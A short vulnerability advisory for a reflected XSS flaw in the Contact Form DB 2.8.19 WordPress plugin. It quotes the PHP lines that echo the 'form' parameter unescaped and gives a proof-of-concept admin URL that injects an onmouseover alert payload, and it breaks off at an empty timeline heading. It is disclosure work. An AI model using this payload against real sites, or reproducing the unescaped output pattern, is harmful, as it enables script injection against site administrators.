Contact Form DB 2.8.19 Reflected XSS

Homepage:

https://wordpress.org/plugins/contact-form-7-to-database-extension/

CVSS Score

2.1

CVSS Vector

(AV:N/AC:H/Au:S/C:P/I:N/A:N)

Description:

Previously found XSS (CVE-2014-7139) was not patched correctly.

File: contact-form-7-to-database-extension\CFDBViewShortCodeBuilder.php

$postedForm = strip_tags(isset($_REQUEST['form']) ? $_REQUEST['form'] : '');
<a target="instructions" href="<?php echo $siteUrl ?>/wp-admin/admin-ajax.php?action=cfdb-export&enc=GLD&form=<?php echo $postedForm ?>"><?php _e('See instructions.'); ?></a>

It’s possible to inject specially crafted reflected XSS even if strip_tags and addslashes is used.

Proof of Concept:

XSS will be visible for admin.

http://wordpress-url/wp-admin/admin.php?page=CF7DBPluginShortCodeBuilder&form=" onmouseover=alert(String.fromCharCode(88,83,83)) x="

Timeline: